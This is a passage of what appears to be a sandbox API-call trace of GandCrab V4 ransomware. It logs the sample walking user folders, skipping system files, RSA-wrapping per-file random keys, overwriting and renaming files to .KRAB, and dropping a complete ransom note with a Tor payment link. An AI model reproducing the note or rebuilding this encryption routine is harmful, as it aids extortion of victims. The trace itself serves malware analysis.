lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x102)) [0062.065] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.067] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.067] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.067] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned 97 [0062.067] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0062.069] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.070] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 74 [0062.070] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0062.070] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd5e0 [0062.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.070] FindNextFileW (in: hFindFile=0xfbd5e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.070] FindNextFileW (in: hFindFile=0xfbd5e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.070] lstrcmpW (lpString1="ContentStore.xml", lpString2=".") returned 1 [0062.070] lstrcmpW (lpString1="ContentStore.xml", lpString2="..") returned 1 [0062.070] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="ContentStore.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" [0062.070] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.071] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.KRAB") returned 95 [0062.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0062.071] lstrlenW (lpString=".xml") returned 4 [0062.071] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.071] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xml ") returned 5 [0062.071] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0062.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0062.071] lstrcmpiW (lpString1="ContentStore.xml", lpString2="desktop.ini") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="autorun.inf") returned 1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="iconcache.db") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="bootsect.bak") returned 1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="boot.ini") returned 1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat.log") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="thumbs.db") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="KRAB-DECRYPT.html") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="KRAB-DECRYPT.txt") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="CRAB-DECRYPT.txt") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntldr") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="NTDETECT.COM") returned -1 [0062.072] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Bootfont.bin") returned 1 [0062.072] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.072] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.073] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.073] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.074] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.074] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0062.074] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.074] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.074] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.074] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.075] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.075] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.075] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0062.075] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.075] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.076] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.076] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd260) returned 1 [0062.076] CryptGetKeyParam (in: hKey=0xfbd260, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.076] CryptEncrypt (in: hKey=0xfbd260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.077] GetLastError () returned 0x0 [0062.077] CryptDestroyKey (hKey=0xfbd260) returned 1 [0062.077] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.077] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.077] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd260) returned 1 [0062.077] CryptGetKeyParam (in: hKey=0xfbd260, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.077] CryptEncrypt (in: hKey=0xfbd260, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.078] GetLastError () returned 0x0 [0062.078] CryptDestroyKey (hKey=0xfbd260) returned 1 [0062.078] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.078] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0062.078] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.079] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.079] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0xa8, lpOverlapped=0x0) returned 1 [0062.097] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.097] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0xa8, lpOverlapped=0x0) returned 1 [0062.097] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0062.101] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.104] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.105] CloseHandle (hObject=0x440) returned 1 [0062.108] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.108] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.krab")) returned 1 [0062.109] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.110] FindNextFileW (in: hFindFile=0xfbd5e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.110] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.110] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.110] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock" [0062.110] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.110] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 102 [0062.110] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned 97 [0062.110] lstrlenW (lpString=".lock") returned 5 [0062.110] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.111] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.111] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.111] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.111] FindNextFileW (in: hFindFile=0xfbd5e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.111] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.111] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.111] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt" [0062.111] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.112] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt.KRAB") returned 95 [0062.112] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt") returned 90 [0062.112] lstrlenW (lpString=".txt") returned 4 [0062.112] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.112] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.112] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt") returned 90 [0062.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\KRAB-DECRYPT.txt") returned 90 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.113] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.113] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.114] FindNextFileW (in: hFindFile=0xfbd5e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0062.114] FindClose (in: hFindFile=0xfbd5e0 | out: hFindFile=0xfbd5e0) returned 1 [0062.114] CloseHandle (hObject=0x3ac) returned 1 [0062.114] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0062.114] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0062.115] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0062.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Speech" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech" [0062.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\" [0062.115] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.115] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.115] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.116] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.116] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\\\KRAB-DECRYPT.txt") returned 72 [0062.116] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\speech\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0062.116] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.117] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.117] CloseHandle (hObject=0x3ac) returned 1 [0062.118] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.118] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.118] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x141)) [0062.118] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.119] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.119] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, 